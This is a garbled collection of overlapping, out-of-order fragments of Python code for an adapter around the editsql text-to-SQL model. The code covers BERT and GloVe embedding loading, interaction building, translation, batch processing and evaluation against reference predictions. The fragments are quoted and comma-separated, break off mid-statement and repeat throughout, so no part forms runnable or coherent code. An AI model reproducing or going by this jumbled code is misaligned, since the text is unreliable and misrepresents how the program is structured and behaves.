SchemaInteractionATISModel( params, data.input_vocabulary, data.output_vocabulary, data.output_vocabulary_schema, data.anonymizer", "model_bert, tokenizer, bert_config # overwrite the original function with the modified version utils_bert.get_bert", "editsql.data_util.atis_data import ATISDataset from editsql.data_util.interaction import load_function from editsql.model import model, utils_bert from", "api.paths import DB_SCHEMAS_FILE class EditsqlAdapter: \"\"\" Uses the functionality of editsql to translate", "an interaction Args: nl_question: the natural language question db_id: the database that acts", "= [nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions=[]) prediction = self.predict(interaction) return self.post_process(prediction, db_id)", "--------------------------------------- input_embedding_size = glove_embedding_size def create_word_embeddings(vocab): vocabulary_embeddings = np.zeros((len(vocab), glove_embedding_size), dtype=np.float32) vocabulary_tokens =", "'mcS': 'multi_cased_L-12_H-768_A-12'} bert_type = map_bert_type_abb[params.bert_type_abb] if params.bert_type_abb == 'cS' or params.bert_type_abb == 'cL'", "natural language question db_id: the database that acts as context Returns: the sql", "token_id = vocab.token_to_id(token) if token in glove_embeddings: vocabulary_embeddings[token_id][:glove_embedding_size] = glove_embeddings[token] else: glove_oov +=", "self.int_load_function = load_function(params, data.entities_dictionary, data.anonymizer, database_schema=self.database_schemas) def load_model(self, params, data): \"\"\" Loads the", "= accuracy if show_all: eval_output[\"content\"] = comparisons else: eval_output[\"diff\"] = comparisons write_json_log_results(eval_output, CURRENT_DIR", "= amount eval_output[\"% equal\"] = accuracy if show_all: eval_output[\"content\"] = comparisons else: eval_output[\"diff\"]", "output_dir=BATCH_OUTPUT_DIR): \"\"\" Read the list of dicts with values for nl_question and db_id", "raw interaction to an InteractionItem obj, _ = self.int_load_function(example) interaction = atis_batch.InteractionItem(obj) return", "of file with list of dicts with values for nl_question and db_id output_dir:", "for token in vocabulary_tokens: token_id = vocab.token_to_id(token) if token in glove_embeddings: vocabulary_embeddings[token_id][:glove_embedding_size] =", "translations are saved \"\"\" edi_adap = EditsqlAdapter() with open(input_file) as f: requests =", "time.time() duration = end - start time_per_item = duration / amount num_correct =", "= create_word_embeddings(input_vocabulary) output_vocabulary_embeddings = create_word_embeddings(output_vocabulary) output_vocabulary_schema_embeddings = None if output_vocabulary_schema: output_vocabulary_schema_embeddings = create_word_embeddings(output_vocabulary_schema)", "= [] # fill the general fields example[\"id\"] = \"dummy id\" example[\"scenario\"] =", "------------ Batch processing ----------------- @classmethod def batch_translate(cls, input_file=BATCH_INPUT_FILE, output_dir=BATCH_OUTPUT_DIR): \"\"\" Read the list", "input_embedding_size # overwrite the original embeddings loading function with the modified version model.load_word_embeddings", "setup_util from api.paths import DB_SCHEMAS_FILE class EditsqlAdapter: \"\"\" Uses the functionality of editsql", "bert_config = BertConfig.from_json_file(bert_config_file) tokenizer = tokenization.FullTokenizer( vocab_file=vocab_file, do_lower_case=do_lower_case) bert_config.print_status() model_bert = BertModel(bert_config) if", "import ATISDataset from editsql.data_util.interaction import load_function from editsql.model import model, utils_bert from editsql.model.schema_interaction_model", "# create the dataset and model data = ATISDataset(params) self.model = self.load_model(params, data)", "= len(references) # determine the instances to test on if randomness: sample_indices =", "example = dict() example[\"final\"] = dict() example[\"interaction\"] = [] # fill the general", "= 300 # ------- use preloaded glove ----------- glove_embeddings = setup_util.glove_embeddings # ---------------------------------------", "pathlib import Path import numpy as np import json import torch from editsql.data_util", "the dataset and model data = ATISDataset(params) self.model = self.load_model(params, data) _, _,", "EditsqlAdapter() with open(input_file) as f: requests = json.load(f) for i, request in enumerate(requests):", "= dict() example[\"interaction\"] = [] # fill the general fields example[\"id\"] = \"dummy", "glove_oov += 1 print('Glove OOV:', glove_oov, 'Para OOV', para_oov, 'Total', len(vocab)) return vocabulary_embeddings", "as np import json import torch from editsql.data_util import atis_batch from editsql.data_util.atis_data import", "= load_word_embeddings_for_editsql # define a modified version with absolute path instead of relative", "c.lower() for c in gold) dev_pred_norm = ''.join(\"0\" if c.isdigit() else c.lower() for", "\"\"\" Loads the editsql translation model Args: params: the parsed arguments data: the", "translation_norm != gold_norm else: is_error = translation_norm != dev_pred_norm if is_error: num_errors +=", "use_gold_query: comparison with the gold queries from spider instead of the prediction results", "= 0 para_oov = 0 for token in vocabulary_tokens: token_id = vocab.token_to_id(token) if", "from file \" + params.save_file) model.eval() return model def prepare_interaction(self, nl_questions, db_id, prev_predictions):", "nl_question and db_id from the input file and save the translations to a", "model = SchemaInteractionATISModel( params, data.input_vocabulary, data.output_vocabulary, data.output_vocabulary_schema, data.anonymizer if params.anonymize and params.anonymization_scoring else", "model def prepare_interaction(self, nl_questions, db_id, prev_predictions): \"\"\" Creates an InteractionItem that contains the", "random.sample(range(len(references)), k=amount) else: sample_indices = range(amount) comparisons = [] num_errors = 0 start", "for nl_question and db_id from the input file and save the translations to", "the translation output of EditsqlAdapter. By default the prediction results of standalone editsql", "= {} if use_gold_query: comparison[\"prediction\"][\"gold \"] = gold else: comparison[\"prediction\"][\"editsql \"] = dev_prediction", "the original embeddings loading function with the modified version model.load_word_embeddings = load_word_embeddings_for_editsql #", "editsql.model.schema_interaction_model import SchemaInteractionATISModel from editsql.postprocess_eval import postprocess_one from editsql.preprocess import read_database_schema from editsql.model.bert", "line def get_bert(params): BERT_PT_PATH = str(TRANSLATORS_DIR / \"editsql/model/bert/data/annotated_wikisql_and_PyTorch_bert_param\") map_bert_type_abb = {'uS': 'uncased_L-12_H-768_A-12', 'uL':", "EditsqlAdapter. By default the prediction results of standalone editsql act as the reference.", "import random import time from pathlib import Path import numpy as np import", "prev_predictions=[]) prediction = self.predict(interaction) return self.post_process(prediction, db_id) def translate_interaction(self, nl_question, db_id, prev_nl_questions, prev_predictions):", "modified embeddings loading function that makes use of the preloaded glove def load_word_embeddings_for_editsql(input_vocabulary,", "previous questions or an empty list prev_predictions: the previous predictions or an empty", "= \" \".join(in_seq_raw) schema = self.database_schemas[db_id] dev_prediction_raw = references[i][\"flat_prediction\"] dev_prediction = \" \".join(dev_prediction_raw)", "/ amount eval_output = dict() eval_output[\"time per item\"] = time_per_item eval_output[\"# items\"] =", "dict() comparison[\"identifier\"] = references[i][\"identifier\"] comparison[\"is_equal\"] = not is_error comparison[\"input_seq\"] = in_seq comparison[\"prediction\"] =", "load_word_embeddings_for_editsql # define a modified version with absolute path instead of relative path", "\".join(references[i][\"gold_query\"]) gold = postprocess_one(gold, schema) # normalize and prevent numbering from distorting the", "= \" \".join(pred_tokens) return pred_str def post_process(self, prediction, db_id): schema = self.database_schemas[db_id] post_processed", "else: params = parse_args_spider.interpret_args() # create the dataset and model data = ATISDataset(params)", "per item\"] = time_per_item eval_output[\"# items\"] = amount eval_output[\"% equal\"] = accuracy if", "vocab.token_to_id(token) if token in glove_embeddings: vocabulary_embeddings[token_id][:glove_embedding_size] = glove_embeddings[token] else: glove_oov += 1 print('Glove", "version with absolute path instead of relative path in the first line def", "f'bert_config_{bert_type}.json') vocab_file = os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt') init_checkpoint = os.path.join(BERT_PT_PATH, f'pytorch_model_{bert_type}.bin') print('bert_config_file', bert_config_file) print('vocab_file', vocab_file)", "= prediction[-1][0] pred_tokens = pred_tokens_raw[:-1] # strip the _EOS symbol pred_str = \"", "question db_id: the database that acts as context Returns: the sql prediction \"\"\"", "the previous predictions or an empty list Returns: the sql prediction \"\"\" #", "from editsql.model.bert.modeling import BertConfig, BertModel from adapters.editsql import parse_args_spider, parse_args_sparc from adapters.editsql.constants import", "= self.model.predict_with_predicted_queries(interaction, 1000) pred_tokens_raw = prediction[-1][0] pred_tokens = pred_tokens_raw[:-1] # strip the _EOS", "Evaluation ----------------- def evaluate(self, amount=0, randomness=False, show_all=False, use_gold_query=False): \"\"\" Evaluate the translation output", "amount default to _all_ examples from the file amount = len(references) # determine", "import model, utils_bert from editsql.model.schema_interaction_model import SchemaInteractionATISModel from editsql.postprocess_eval import postprocess_one from editsql.preprocess", "switch enables comparison with the gold queries from spider Args: amount: the amount", "utils_bert from editsql.model.schema_interaction_model import SchemaInteractionATISModel from editsql.postprocess_eval import postprocess_one from editsql.preprocess import read_database_schema", "example[\"interaction_id\"] = 42 # fill the content fields example[\"database_id\"] = db_id prev_predictions.append(\"dummy sql", "# fill the content fields example[\"database_id\"] = db_id prev_predictions.append(\"dummy sql query\") for i,", "db_id prev_predictions.append(\"dummy sql query\") for i, nl_q in enumerate(nl_questions): sql_int = [(prev_predictions[i].split(), [])]", "= \"dummy id\" example[\"scenario\"] = \"\" example[\"interaction_id\"] = 42 # fill the content", "nl_question, db_id): \"\"\" Translate a single natural language question into sql Args: nl_question:", "instead of the prediction results of standalone editsql \"\"\" # load the prediction", "= vocab.token_to_id(token) if token in glove_embeddings: vocabulary_embeddings[token_id][:glove_embedding_size] = glove_embeddings[token] else: glove_oov += 1", "if token in glove_embeddings: vocabulary_embeddings[token_id][:glove_embedding_size] = glove_embeddings[token] else: glove_oov += 1 print('Glove OOV:',", "the amount of samples to use randomness: randomly choose samples show_all: write all", "an empty list Returns: the sql prediction \"\"\" # preprocess nl_questions = prev_nl_questions", "bert_type = map_bert_type_abb[params.bert_type_abb] if params.bert_type_abb == 'cS' or params.bert_type_abb == 'cL' or params.bert_type_abb", "output_vocabulary_schema_embeddings, input_embedding_size # overwrite the original embeddings loading function with the modified version", "init_checkpoint) bert_config = BertConfig.from_json_file(bert_config_file) tokenizer = tokenization.FullTokenizer( vocab_file=vocab_file, do_lower_case=do_lower_case) bert_config.print_status() model_bert = BertModel(bert_config)", "of dicts with values for nl_question and db_id output_dir: path of dir where", "print('vocab_file', vocab_file) print('init_checkpoint', init_checkpoint) bert_config = BertConfig.from_json_file(bert_config_file) tokenizer = tokenization.FullTokenizer( vocab_file=vocab_file, do_lower_case=do_lower_case) bert_config.print_status()", "def __init__(self, model=\"spider\"): if model == \"sparc\": params = parse_args_sparc.interpret_args() else: params =", "time from pathlib import Path import numpy as np import json import torch", "nl_q, \"sql\": sql_int}) example[\"final\"][\"utterance\"] = nl_questions[-1] example[\"final\"][\"sql\"] = \"query to be predicted\" #", "filename = time.strftime(\"%Y_%m_%d-%H_%M_%S\") + \".json\" with open(str(path / filename), 'w') as outfile: json.dump(content,", "params.anonymize and params.anonymization_scoring else None) model.load_state_dict(torch.load(params.save_file,map_location='cpu')) print(\"Loaded model from file \" + params.save_file)", "is_error or show_all: comparison = dict() comparison[\"identifier\"] = references[i][\"identifier\"] comparison[\"is_equal\"] = not is_error", "OOV', para_oov, 'Total', len(vocab)) return vocabulary_embeddings input_vocabulary_embeddings = create_word_embeddings(input_vocabulary) output_vocabulary_embeddings = create_word_embeddings(output_vocabulary) output_vocabulary_schema_embeddings", "that acts as context prev_predictions: the previous predictions Returns: an InteractionItem that contains", "or show_all: comparison = dict() comparison[\"identifier\"] = references[i][\"identifier\"] comparison[\"is_equal\"] = not is_error comparison[\"input_seq\"]", "300 # ------- use preloaded glove ----------- glove_embeddings = setup_util.glove_embeddings # --------------------------------------- input_embedding_size", "SchemaInteractionATISModel from editsql.postprocess_eval import postprocess_one from editsql.preprocess import read_database_schema from editsql.model.bert import tokenization", "DB_SCHEMAS_FILE class EditsqlAdapter: \"\"\" Uses the functionality of editsql to translate arbitrary questions", "pre-trained parameters.\") device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model_bert.to(device) return model_bert, tokenizer,", "in_seq_raw = references[i][\"input_seq\"] in_seq = \" \".join(in_seq_raw) schema = self.database_schemas[db_id] dev_prediction_raw = references[i][\"flat_prediction\"]", "the natural language questions db_id: the database that acts as context prev_predictions: the", "question and the database id \"\"\" # establish the structure of an interaction", "output of EditsqlAdapter. By default the prediction results of standalone editsql act as", "'cS' or params.bert_type_abb == 'cL' or params.bert_type_abb == 'mcS': do_lower_case = False else:", "\"\"\" # preprocess nl_questions = [nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions=[]) prediction =", "natural language question db_id: the database that acts as context prev_nl_questions: the previous", "the _EOS symbol pred_str = \" \".join(pred_tokens) return pred_str def post_process(self, prediction, db_id):", "else: is_error = translation_norm != dev_pred_norm if is_error: num_errors += 1 if is_error", "and db_id output_dir: path of dir where the translations are saved \"\"\" edi_adap", "from editsql.preprocess import read_database_schema from editsql.model.bert import tokenization as tokenization from editsql.model.bert.modeling import", "the sql for the next utterance in an interaction Args: nl_question: the natural", "glove def load_word_embeddings_for_editsql(input_vocabulary, output_vocabulary, output_vocabulary_schema, params): glove_embedding_size = 300 # ------- use preloaded", "= create_word_embeddings(output_vocabulary_schema) return input_vocabulary_embeddings, output_vocabulary_embeddings, output_vocabulary_schema_embeddings, input_embedding_size # overwrite the original embeddings loading", "# preprocess nl_questions = prev_nl_questions + [nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions) prediction", "results gold_norm = ''.join(\"0\" if c.isdigit() else c.lower() for c in gold) dev_pred_norm", "'cL': 'cased_L-24_H-1024_A-16', 'mcS': 'multi_cased_L-12_H-768_A-12'} bert_type = map_bert_type_abb[params.bert_type_abb] if params.bert_type_abb == 'cS' or params.bert_type_abb", "comparison with the gold queries from spider instead of the prediction results of", "transform the raw interaction to an InteractionItem obj, _ = self.int_load_function(example) interaction =", "_ = self.int_load_function(example) interaction = atis_batch.InteractionItem(obj) return interaction def translate(self, nl_question, db_id): \"\"\"", "{} if use_gold_query: comparison[\"prediction\"][\"gold \"] = gold else: comparison[\"prediction\"][\"editsql \"] = dev_prediction comparison[\"prediction\"][\"translation\"]", "write_json_log_results(content, directory): path = Path(directory) filename = time.strftime(\"%Y_%m_%d-%H_%M_%S\") + \".json\" with open(str(path /", "----------- glove_embeddings = setup_util.glove_embeddings # --------------------------------------- input_embedding_size = glove_embedding_size def create_word_embeddings(vocab): vocabulary_embeddings =", "of standalone editsql with open(EVAL_REFERENCE_FILE) as infile: references = json.load(infile) if not amount:", "directory Args: input_file: path of file with list of dicts with values for", "= os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt') init_checkpoint = os.path.join(BERT_PT_PATH, f'pytorch_model_{bert_type}.bin') print('bert_config_file', bert_config_file) print('vocab_file', vocab_file) print('init_checkpoint', init_checkpoint)", "interaction): prediction = self.model.predict_with_predicted_queries(interaction, 1000) pred_tokens_raw = prediction[-1][0] pred_tokens = pred_tokens_raw[:-1] # strip", "db_id, prev_predictions): \"\"\" Creates an InteractionItem that contains the natural language question and", "amount eval_output = dict() eval_output[\"time per item\"] = time_per_item eval_output[\"# items\"] = amount", "with values for nl_question and db_id output_dir: path of dir where the translations", "create_word_embeddings(input_vocabulary) output_vocabulary_embeddings = create_word_embeddings(output_vocabulary) output_vocabulary_schema_embeddings = None if output_vocabulary_schema: output_vocabulary_schema_embeddings = create_word_embeddings(output_vocabulary_schema) return", "data.anonymizer, database_schema=self.database_schemas) def load_model(self, params, data): \"\"\" Loads the editsql translation model Args:", "= dict() example[\"final\"] = dict() example[\"interaction\"] = [] # fill the general fields", "to translate arbitrary questions into sql \"\"\" def __init__(self, model=\"spider\"): if model ==", "define a modified version with absolute path instead of relative path in the", "edi_adap = EditsqlAdapter() with open(input_file) as f: requests = json.load(f) for i, request", "interaction in raw state self.int_load_function = load_function(params, data.entities_dictionary, data.anonymizer, database_schema=self.database_schemas) def load_model(self, params,", "print('Glove OOV:', glove_oov, 'Para OOV', para_oov, 'Total', len(vocab)) return vocabulary_embeddings input_vocabulary_embeddings = create_word_embeddings(input_vocabulary)", "start = time.time() for i in sample_indices: db_id = references[i][\"database_id\"] in_seq_raw = references[i][\"input_seq\"]", "params, data): \"\"\" Loads the editsql translation model Args: params: the parsed arguments", "content fields example[\"database_id\"] = db_id prev_predictions.append(\"dummy sql query\") for i, nl_q in enumerate(nl_questions):", "as f: requests = json.load(f) for i, request in enumerate(requests): request[\"sql\"] = edi_adap.translate(request[\"nl_question\"],", "'w') as outfile: json.dump(content, outfile, indent=4) # define a modified embeddings loading function", "eval_output[\"time per item\"] = time_per_item eval_output[\"# items\"] = amount eval_output[\"% equal\"] = accuracy", "acts as context prev_nl_questions: the previous questions or an empty list prev_predictions: the", "file amount = len(references) # determine the instances to test on if randomness:", "is_error = translation_norm != gold_norm else: is_error = translation_norm != dev_pred_norm if is_error:", "eval_output[\"% equal\"] = accuracy if show_all: eval_output[\"content\"] = comparisons else: eval_output[\"diff\"] = comparisons", "model.load_word_embeddings = load_word_embeddings_for_editsql # define a modified version with absolute path instead of", "= os.path.join(BERT_PT_PATH, f'pytorch_model_{bert_type}.bin') print('bert_config_file', bert_config_file) print('vocab_file', vocab_file) print('init_checkpoint', init_checkpoint) bert_config = BertConfig.from_json_file(bert_config_file) tokenizer", "use preloaded glove ----------- glove_embeddings = setup_util.glove_embeddings # --------------------------------------- input_embedding_size = glove_embedding_size def", "the database that acts as context Returns: the sql prediction \"\"\" # preprocess", "is_error = translation_norm != dev_pred_norm if is_error: num_errors += 1 if is_error or", "database that acts as context prev_nl_questions: the previous questions or an empty list", "output_dir: path of dir where the translations are saved \"\"\" edi_adap = EditsqlAdapter()", "\"\"\" edi_adap = EditsqlAdapter() with open(input_file) as f: requests = json.load(f) for i,", "in glove_embeddings: vocabulary_embeddings[token_id][:glove_embedding_size] = glove_embeddings[token] else: glove_oov += 1 print('Glove OOV:', glove_oov, 'Para", "parse_args_spider.interpret_args() # create the dataset and model data = ATISDataset(params) self.model = self.load_model(params,", "pred_tokens_raw[:-1] # strip the _EOS symbol pred_str = \" \".join(pred_tokens) return pred_str def", "makes use of the preloaded glove def load_word_embeddings_for_editsql(input_vocabulary, output_vocabulary, output_vocabulary_schema, params): glove_embedding_size =", "torch.cuda.is_available() else \"cpu\") model_bert.to(device) return model_bert, tokenizer, bert_config # overwrite the original function", "from editsql.model import model, utils_bert from editsql.model.schema_interaction_model import SchemaInteractionATISModel from editsql.postprocess_eval import postprocess_one", "+ [nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions) prediction = self.predict(interaction) return self.post_process(prediction, db_id)", "Translate a single natural language question into sql Args: nl_question: the natural language", "import postprocess_one from editsql.preprocess import read_database_schema from editsql.model.bert import tokenization as tokenization from", "empty list Returns: the sql prediction \"\"\" # preprocess nl_questions = prev_nl_questions +", "dev_prediction) translation_norm = ''.join(\"0\" if c.isdigit() else c.lower() for c in translation) if", "= setup_util.glove_embeddings # --------------------------------------- input_embedding_size = glove_embedding_size def create_word_embeddings(vocab): vocabulary_embeddings = np.zeros((len(vocab), glove_embedding_size),", "use_gold_query: comparison[\"prediction\"][\"gold \"] = gold else: comparison[\"prediction\"][\"editsql \"] = dev_prediction comparison[\"prediction\"][\"translation\"] = translation", "os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt') init_checkpoint = os.path.join(BERT_PT_PATH, f'pytorch_model_{bert_type}.bin') print('bert_config_file', bert_config_file) print('vocab_file', vocab_file) print('init_checkpoint', init_checkpoint) bert_config", "default the prediction results of standalone editsql act as the reference. The use_gold_query", "Read the list of dicts with values for nl_question and db_id from the", "previous predictions or an empty list Returns: the sql prediction \"\"\" # preprocess", "randomness: sample_indices = random.sample(range(len(references)), k=amount) else: sample_indices = range(amount) comparisons = [] num_errors", "into sql Args: nl_question: the natural language question db_id: the database that acts", "strip the _EOS symbol pred_str = \" \".join(pred_tokens) return pred_str def post_process(self, prediction,", "in raw state example = dict() example[\"final\"] = dict() example[\"interaction\"] = [] #", "self.post_process(prediction, db_id) def translate_interaction(self, nl_question, db_id, prev_nl_questions, prev_predictions): \"\"\" Predict the sql for", "c.isdigit() else c.lower() for c in dev_prediction) translation_norm = ''.join(\"0\" if c.isdigit() else", "= np.zeros((len(vocab), glove_embedding_size), dtype=np.float32) vocabulary_tokens = vocab.inorder_tokens glove_oov = 0 para_oov = 0", "results of standalone editsql \"\"\" # load the prediction results of standalone editsql", "instead of relative path in the first line def get_bert(params): BERT_PT_PATH = str(TRANSLATORS_DIR", "and the database id \"\"\" # establish the structure of an interaction in", "pass else: model_bert.load_state_dict(torch.load(init_checkpoint, map_location='cpu')) print(\"Load pre-trained parameters.\") device = torch.device(\"cuda\" if torch.cuda.is_available() else", "in_seq = \" \".join(in_seq_raw) schema = self.database_schemas[db_id] dev_prediction_raw = references[i][\"flat_prediction\"] dev_prediction = \"", "adapters.editsql import parse_args_spider, parse_args_sparc from adapters.editsql.constants import * from api import setup_util from", "if show_all: eval_output[\"content\"] = comparisons else: eval_output[\"diff\"] = comparisons write_json_log_results(eval_output, CURRENT_DIR / \"evaluation/results\")", "= range(amount) comparisons = [] num_errors = 0 start = time.time() for i", "# function used for loading of interaction in raw state self.int_load_function = load_function(params,", "comparison[\"prediction\"][\"translation\"] = translation comparisons.append(comparison) end = time.time() duration = end - start time_per_item", "the output directory Args: input_file: path of file with list of dicts with", "1 if is_error or show_all: comparison = dict() comparison[\"identifier\"] = references[i][\"identifier\"] comparison[\"is_equal\"] =", "the previous questions or an empty list prev_predictions: the previous predictions or an", "amount: the amount of samples to use randomness: randomly choose samples show_all: write", "= True no_pretraining = False bert_config_file = os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json') vocab_file = os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt')", "\"] = dev_prediction comparison[\"prediction\"][\"translation\"] = translation comparisons.append(comparison) end = time.time() duration = end", "json.dump(content, outfile, indent=4) # define a modified embeddings loading function that makes use", "init_checkpoint = os.path.join(BERT_PT_PATH, f'pytorch_model_{bert_type}.bin') print('bert_config_file', bert_config_file) print('vocab_file', vocab_file) print('init_checkpoint', init_checkpoint) bert_config = BertConfig.from_json_file(bert_config_file)", "= parse_args_sparc.interpret_args() else: params = parse_args_spider.interpret_args() # create the dataset and model data", "print('init_checkpoint', init_checkpoint) bert_config = BertConfig.from_json_file(bert_config_file) tokenizer = tokenization.FullTokenizer( vocab_file=vocab_file, do_lower_case=do_lower_case) bert_config.print_status() model_bert =", "Args: nl_questions: the natural language questions db_id: the database that acts as context", "if no_pretraining: pass else: model_bert.load_state_dict(torch.load(init_checkpoint, map_location='cpu')) print(\"Load pre-trained parameters.\") device = torch.device(\"cuda\" if", "outfile, indent=4) # define a modified embeddings loading function that makes use of", "loading of interaction in raw state self.int_load_function = load_function(params, data.entities_dictionary, data.anonymizer, database_schema=self.database_schemas) def", "= time.time() duration = end - start time_per_item = duration / amount num_correct", "with list of dicts with values for nl_question and db_id output_dir: path of", "in enumerate(requests): request[\"sql\"] = edi_adap.translate(request[\"nl_question\"], request[\"db_id\"]) write_json_log_results(requests, output_dir) def write_json_log_results(content, directory): path =", "amount - num_errors accuracy = num_correct * 100 / amount eval_output = dict()", "reference. The use_gold_query switch enables comparison with the gold queries from spider Args:", "save the translations to a file in the output directory Args: input_file: path", "batch_translate(cls, input_file=BATCH_INPUT_FILE, output_dir=BATCH_OUTPUT_DIR): \"\"\" Read the list of dicts with values for nl_question", "db_id: the database that acts as context prev_nl_questions: the previous questions or an", "numpy as np import json import torch from editsql.data_util import atis_batch from editsql.data_util.atis_data", "params = parse_args_spider.interpret_args() # create the dataset and model data = ATISDataset(params) self.model", "ATISDataset(params) self.model = self.load_model(params, data) _, _, self.database_schemas = read_database_schema(DB_SCHEMAS_FILE, schema_tokens={}, column_names={}, database_schemas_dict={})", "prediction[-1][0] pred_tokens = pred_tokens_raw[:-1] # strip the _EOS symbol pred_str = \" \".join(pred_tokens)", "prediction results of standalone editsql with open(EVAL_REFERENCE_FILE) as infile: references = json.load(infile) if", "else c.lower() for c in gold) dev_pred_norm = ''.join(\"0\" if c.isdigit() else c.lower()", "self.int_load_function(example) interaction = atis_batch.InteractionItem(obj) return interaction def translate(self, nl_question, db_id): \"\"\" Translate a", "\"\"\" # establish the structure of an interaction in raw state example =", "amount eval_output[\"% equal\"] = accuracy if show_all: eval_output[\"content\"] = comparisons else: eval_output[\"diff\"] =", "\"\"\" def __init__(self, model=\"spider\"): if model == \"sparc\": params = parse_args_sparc.interpret_args() else: params", "i in sample_indices: db_id = references[i][\"database_id\"] in_seq_raw = references[i][\"input_seq\"] in_seq = \" \".join(in_seq_raw)", "the input file and save the translations to a file in the output", "with absolute path instead of relative path in the first line def get_bert(params):", "params.bert_type_abb == 'cL' or params.bert_type_abb == 'mcS': do_lower_case = False else: do_lower_case =", "be predicted\" # transform the raw interaction to an InteractionItem obj, _ =", "preloaded glove ----------- glove_embeddings = setup_util.glove_embeddings # --------------------------------------- input_embedding_size = glove_embedding_size def create_word_embeddings(vocab):", "of standalone editsql act as the reference. The use_gold_query switch enables comparison with", "range(amount) comparisons = [] num_errors = 0 start = time.time() for i in", "the structure of an interaction in raw state example = dict() example[\"final\"] =", "data) _, _, self.database_schemas = read_database_schema(DB_SCHEMAS_FILE, schema_tokens={}, column_names={}, database_schemas_dict={}) # function used for", "path of file with list of dicts with values for nl_question and db_id", "instances to test on if randomness: sample_indices = random.sample(range(len(references)), k=amount) else: sample_indices =", "= glove_embeddings[token] else: glove_oov += 1 print('Glove OOV:', glove_oov, 'Para OOV', para_oov, 'Total',", "in the first line def get_bert(params): BERT_PT_PATH = str(TRANSLATORS_DIR / \"editsql/model/bert/data/annotated_wikisql_and_PyTorch_bert_param\") map_bert_type_abb =", "100 / amount eval_output = dict() eval_output[\"time per item\"] = time_per_item eval_output[\"# items\"]", "questions or an empty list prev_predictions: the previous predictions or an empty list", "show_all: eval_output[\"content\"] = comparisons else: eval_output[\"diff\"] = comparisons write_json_log_results(eval_output, CURRENT_DIR / \"evaluation/results\") #", "general fields example[\"id\"] = \"dummy id\" example[\"scenario\"] = \"\" example[\"interaction_id\"] = 42 #", "tokenizer, bert_config # overwrite the original function with the modified version utils_bert.get_bert =", "editsql act as the reference. The use_gold_query switch enables comparison with the gold", "interaction def translate(self, nl_question, db_id): \"\"\" Translate a single natural language question into", "example[\"final\"] = dict() example[\"interaction\"] = [] # fill the general fields example[\"id\"] =", "dev_prediction_raw = references[i][\"flat_prediction\"] dev_prediction = \" \".join(dev_prediction_raw) dev_prediction = postprocess_one(dev_prediction, schema) translation =", "amount of samples to use randomness: randomly choose samples show_all: write all samples,", "def create_word_embeddings(vocab): vocabulary_embeddings = np.zeros((len(vocab), glove_embedding_size), dtype=np.float32) vocabulary_tokens = vocab.inorder_tokens glove_oov = 0", "= str(TRANSLATORS_DIR / \"editsql/model/bert/data/annotated_wikisql_and_PyTorch_bert_param\") map_bert_type_abb = {'uS': 'uncased_L-12_H-768_A-12', 'uL': 'uncased_L-24_H-1024_A-16', 'cS': 'cased_L-12_H-768_A-12', 'cL':", "tokenization as tokenization from editsql.model.bert.modeling import BertConfig, BertModel from adapters.editsql import parse_args_spider, parse_args_sparc", "an InteractionItem that contains the natural language question and the database id \"\"\"", "from spider instead of the prediction results of standalone editsql \"\"\" # load", "natural language question into sql Args: nl_question: the natural language question db_id: the", "translation_norm = ''.join(\"0\" if c.isdigit() else c.lower() for c in translation) if use_gold_query:", "glove_embeddings = setup_util.glove_embeddings # --------------------------------------- input_embedding_size = glove_embedding_size def create_word_embeddings(vocab): vocabulary_embeddings = np.zeros((len(vocab),", "str(TRANSLATORS_DIR / \"editsql/model/bert/data/annotated_wikisql_and_PyTorch_bert_param\") map_bert_type_abb = {'uS': 'uncased_L-12_H-768_A-12', 'uL': 'uncased_L-24_H-1024_A-16', 'cS': 'cased_L-12_H-768_A-12', 'cL': 'cased_L-24_H-1024_A-16',", "{'uS': 'uncased_L-12_H-768_A-12', 'uL': 'uncased_L-24_H-1024_A-16', 'cS': 'cased_L-12_H-768_A-12', 'cL': 'cased_L-24_H-1024_A-16', 'mcS': 'multi_cased_L-12_H-768_A-12'} bert_type = map_bert_type_abb[params.bert_type_abb]", "schema) return post_processed # ------------ Evaluation ----------------- def evaluate(self, amount=0, randomness=False, show_all=False, use_gold_query=False):", "= not is_error comparison[\"input_seq\"] = in_seq comparison[\"prediction\"] = {} if use_gold_query: comparison[\"prediction\"][\"gold \"]", "amount num_correct = amount - num_errors accuracy = num_correct * 100 / amount", "= dict() eval_output[\"time per item\"] = time_per_item eval_output[\"# items\"] = amount eval_output[\"% equal\"]", "questions db_id: the database that acts as context prev_predictions: the previous predictions Returns:", "self.database_schemas[db_id] dev_prediction_raw = references[i][\"flat_prediction\"] dev_prediction = \" \".join(dev_prediction_raw) dev_prediction = postprocess_one(dev_prediction, schema) translation", "sql prediction \"\"\" # preprocess nl_questions = prev_nl_questions + [nl_question] interaction = self.prepare_interaction(nl_questions,", "num_correct * 100 / amount eval_output = dict() eval_output[\"time per item\"] = time_per_item", "= atis_batch.InteractionItem(obj) return interaction def translate(self, nl_question, db_id): \"\"\" Translate a single natural", "in sample_indices: db_id = references[i][\"database_id\"] in_seq_raw = references[i][\"input_seq\"] in_seq = \" \".join(in_seq_raw) schema", "from spider Args: amount: the amount of samples to use randomness: randomly choose", "self.post_process(prediction, db_id) def predict(self, interaction): prediction = self.model.predict_with_predicted_queries(interaction, 1000) pred_tokens_raw = prediction[-1][0] pred_tokens", "saved \"\"\" edi_adap = EditsqlAdapter() with open(input_file) as f: requests = json.load(f) for", "state self.int_load_function = load_function(params, data.entities_dictionary, data.anonymizer, database_schema=self.database_schemas) def load_model(self, params, data): \"\"\" Loads", "language question into sql Args: nl_question: the natural language question db_id: the database", "as the reference. The use_gold_query switch enables comparison with the gold queries from", "output_vocabulary_embeddings, output_vocabulary_schema_embeddings, input_embedding_size # overwrite the original embeddings loading function with the modified", "db_id, prev_predictions) prediction = self.predict(interaction) return self.post_process(prediction, db_id) def predict(self, interaction): prediction =", "for loading of interaction in raw state self.int_load_function = load_function(params, data.entities_dictionary, data.anonymizer, database_schema=self.database_schemas)", "= EditsqlAdapter() with open(input_file) as f: requests = json.load(f) for i, request in", "print(\"Loaded model from file \" + params.save_file) model.eval() return model def prepare_interaction(self, nl_questions,", "the natural language 